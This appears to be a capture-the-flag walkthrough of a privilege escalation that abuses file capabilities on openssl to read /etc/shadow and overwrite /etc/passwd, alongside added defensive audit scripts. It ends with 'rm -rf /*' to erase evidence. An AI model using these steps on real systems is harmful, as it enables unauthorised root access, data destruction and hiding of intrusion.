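"""Audit `getcap -r /` output for file capabilities that bypass file permissions
or allow packet capture.

Added example for this write-up, not code from the original post.
"""
import re
from typing import List, NamedTuple, Optional, Tuple


class CapEntry(NamedTuple):
    path: str
    caps: Tuple[str, ...]   # empty together with all_caps=True means every capability
    flags: str              # subset of "eip": effective / inheritable / permitted
    all_caps: bool


# "cap_a,cap_b+ep", "cap_a=ep" or "=ep" (empty set with '=' means all capabilities)
_CAPSTR = re.compile(r"^([a-z_0-9,]*)([+=])([eip]+)$")


def parse_getcap_line(line: str) -> Optional[CapEntry]:
    line = line.split("#", 1)[0].rstrip()            # drop trailing comments
    if not line.strip():
        return None
    if " = " in line:                                  # libcap <= 2.40: "path = cap_a,cap_b+ep"
        path, capstr = line.split(" = ", 1)
    elif " =" in line:                                 # same, empty set: "path =ep"
        path, capstr = line.split(" =", 1)
        capstr = "=" + capstr
    else:                                              # libcap >= 2.41: "path cap_a,cap_b=ep"
        path, capstr = line.rsplit(None, 1)
    m = _CAPSTR.match(capstr.strip())
    if not m:
        return None
    caps = tuple(c for c in m.group(1).split(",") if c)
    all_caps = m.group(2) == "=" and not caps
    return CapEntry(path.strip(), caps, m.group(3), all_caps)


# Capabilities that defeat DAC or identity checks outright (this example's own grouping).
PRIV_BYPASS = {"cap_dac_override", "cap_dac_read_search", "cap_chown", "cap_fowner",
               "cap_setuid", "cap_setgid", "cap_sys_admin", "cap_sys_ptrace",
               "cap_sys_module", "cap_setfcap"}
NETWORK = {"cap_net_raw", "cap_net_admin"}


def severity(e: CapEntry) -> Tuple[str, str]:
    if e.all_caps:
        return "critical", "every capability in effective+permitted: file permissions no longer apply"
    held = set(e.caps)
    if held & PRIV_BYPASS:
        return "high", "bypasses file permission or identity checks: " + ",".join(sorted(held & PRIV_BYPASS))
    if held & NETWORK:
        return "medium", "raw sockets / packet capture: " + ",".join(sorted(held & NETWORK))
    return "low", "no file-access or network capability"


def audit_getcap(lines: List[str]) -> List[Tuple[str, str, str]]:
    """(path, severity, reason) for each parsable line, worst first, then by path."""
    rank = {"critical": 0, "high": 1, "medium": 2, "low": 3}
    findings = []
    for line in lines:
        e = parse_getcap_line(line)
        if e is None:
            continue
        sev, why = severity(e)
        findings.append((e.path, sev, why))
    findings.sort(key=lambda f: (rank[f[1]], f[0]))
    return findings


# Constructed sample: the page's two listings plus one line in the newer format.
SAMPLE = """\
/usr/bin/ping = cap_net_admin,cap_net_raw+p
/usr/sbin/mtr = cap_net_raw+ep
/usr/sbin/suexec = cap_setgid,cap_setuid+ep
/usr/sbin/arping = cap_net_raw+p
/usr/sbin/clockdiff = cap_net_raw+p
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+ep #Interesting...
/home/ldapuser1/openssl =ep
/usr/bin/newer-tool cap_net_bind_service=ep
""".splitlines()

if __name__ == "__main__":
    for path, sev, why in audit_getcap(SAMPLE):
        print(f"{sev:8} {path:28} {why}")
```

The two findings that matter on this box come out on top: `openssl` with all capabilities (critical) and `suexec` with `cap_setuid,cap_setgid` (high, but a stock Apache helper); `tcpdump` lands in the medium class because `cap_net_raw` alone only permits sniffing. A stock-image baseline of expected entries (ping, arping, mtr, suexec) would turn the remaining output into pure noise removal.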

{% code title="Target Terminal \[ldapuser1]" %}

```bash
# Testing the exploit
[ldapuser1@lightweight ~]$ cat /etc/shadow
cat: /etc/shadow: Permission denied

[ldapuser1@lightweight ~]$ ./openssl enc -in "/etc/shadow"
root:$6$eVOz8tJs$xpjymy5BFFeCIHq9a.BoKZeyPReKd7pwoXnxFNOa7TP5ltNmSDsiyuS/ZqTgAGNEbx5jyZpCnbf8xIJ0Po6N8.:17711:0:99999:7:::
bin:*:17632:0:99999:7:::
daemon:*:17632:0:99999:7:::
<...>
```

{% endcode %}

{% code title="Target Terminal \[ldapuser1]" %}

```bash
[ldapuser1@lightweight ~]$ ./openssl enc -in "/root/root.txt"
59e97417b2a124939865fe588a731e8b
```

{% endcode %}

We could even get the flag this way, but we want a real privilege escalation by setting root's password… let's go to <https://gtfobins.github.io/gtfobins/openssl/#file-write> to modify /etc/passwd.

{% code title="Target Terminal \[ldapuser1]" %}

```bash
$ cd ~

$ cp /etc/passwd passwd

$ openssl passwd   # Here I used 'hello' as password
Password: #hello
Verifying - Password: # hello
z4oRRkp3WBrCc # Save this
```

{% endcode %}

{% code title="Local Terminal" %}

```bash
$ hashid z4oRRkp3WBrCc
Analyzing 'z4oRRkp3WBrCc'
[+] DES(Unix)
[+] Traditional DES
[+] DEScrypt
```

{% endcode %}

{% code title="Target Terminal \[ldapuser1]" %}

```bash
$ nano passwd
```

{% endcode %}

Replace the "X" with "z4oRRkp3WBrCc"

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2F7E0Yug9g0DHPgGE4A0Wq%2Fimage.png?alt=media&#x26;token=1a50b450-96bd-4979-a932-11ad86fda120" alt=""><figcaption></figcaption></figure>

With this, the system will no longer look up root's password in **/etc/shadow** (stored as SHA-512 hashes; check with `grep "ENCRYPT_METHOD" /etc/login.defs` on the target) but will read the hash straight from /etc/passwd… and with the capability on openssl we can overwrite the password file.

{% code title="Target Terminal \[ldapuser1]" %}

```bash
$ cat passwd | ./openssl enc -out /etc/passwd
# No message, it works.
$ cat /etc/passwd
root:z4oRRkp3WBrCc:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
<...>

$ su root #using hello as password
```

{% endcode %}
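The step above works because a non-`x` second field in `/etc/passwd` is authenticated directly, so a world-readable file silently becomes the password store, and the `openssl passwd` default produced a legacy DES hash on top of that. The block below is an added example, not code from the original write-up or from the machine: an audit over `/etc/passwd` lines that flags exactly this condition (hash material outside `/etc/shadow`, empty password fields, extra UID 0 accounts, and hashes weaker than the system's `ENCRYPT_METHOD`). The sample is constructed from the `cat /etc/passwd` output above, with a few made-up accounts added to exercise each check.

```python
"""Audit /etc/passwd for password fields that bypass /etc/shadow.

Added example for this write-up, not code from the original post.
"""
import re
from typing import List, NamedTuple


class PasswdFinding(NamedTuple):
    user: str
    severity: str
    reason: str


# Constructed excerpt: first lines from the page, the rest made up for the audit.
SAMPLE = """\
root:z4oRRkp3WBrCc:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
ldapuser1:x:1000:1000::/home/ldapuser1:/bin/bash
backup:$6$saltsalt$fakehashfakehash:1005:1005::/home/backup:/bin/bash
svc:*:1006:1006::/var/empty:/sbin/nologin
toor::0:0:toor:/root:/bin/bash
""".splitlines()


def hash_kind(field: str) -> str:
    """Classify the password field: shadow marker, locked, empty, or the crypt(3) scheme used."""
    if field == "x":
        return "shadow"                       # real hash lives in /etc/shadow (the normal case)
    if field == "":
        return "empty"
    if field == "*" or field.startswith("!"):
        return "locked"
    if field.startswith("$6$"):
        return "sha512crypt"
    if field.startswith("$5$"):
        return "sha256crypt"
    if field.startswith("$1$"):
        return "md5crypt"
    if re.fullmatch(r"[./0-9A-Za-z]{13}", field):
        return "descrypt"                     # 2-char salt + 11 chars: traditional DES
    return "unknown"


def audit_passwd(lines: List[str], encrypt_method: str = "SHA512") -> List[PasswdFinding]:
    """encrypt_method mirrors ENCRYPT_METHOD from /etc/login.defs (SHA512 on this box)."""
    findings: List[PasswdFinding] = []
    for line in lines:
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(PasswdFinding(fields[0], "high", "malformed entry (expected 7 fields)"))
            continue
        user, pw, uid = fields[0], fields[1], fields[2]
        kind = hash_kind(pw)
        if kind == "empty":
            findings.append(PasswdFinding(user, "critical", "empty password field: login without a password"))
        elif kind not in ("shadow", "locked"):
            sev = "critical" if uid == "0" else "high"
            findings.append(PasswdFinding(user, sev, f"{kind} hash stored in world-readable /etc/passwd; /etc/shadow bypassed"))
            if kind == "descrypt" and encrypt_method.upper() != "DES":
                findings.append(PasswdFinding(user, "high", f"legacy DES hash (8-char limit, fast to crack) while ENCRYPT_METHOD is {encrypt_method}"))
        if uid == "0" and user != "root":
            findings.append(PasswdFinding(user, "critical", "additional UID 0 account"))
    return findings


if __name__ == "__main__":
    for f in audit_passwd(SAMPLE):
        print(f"{f.severity:8} {f.user:10} {f.reason}")
```

Running this from a cron job or a configuration-management check turns the modification made in this write-up into an alert within minutes; the same integrity signal is available from `rpm -V setup` or an AIDE/`auditd` watch on `/etc/passwd`, which also catches the write regardless of which capability-bearing binary performed it.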

{% code title="Target Terminal \[root]" %}

```bash
$ cd /root
$ cat /root/root.txt

$ rm -rf /* # To remove all the evidence
```

{% endcode %}
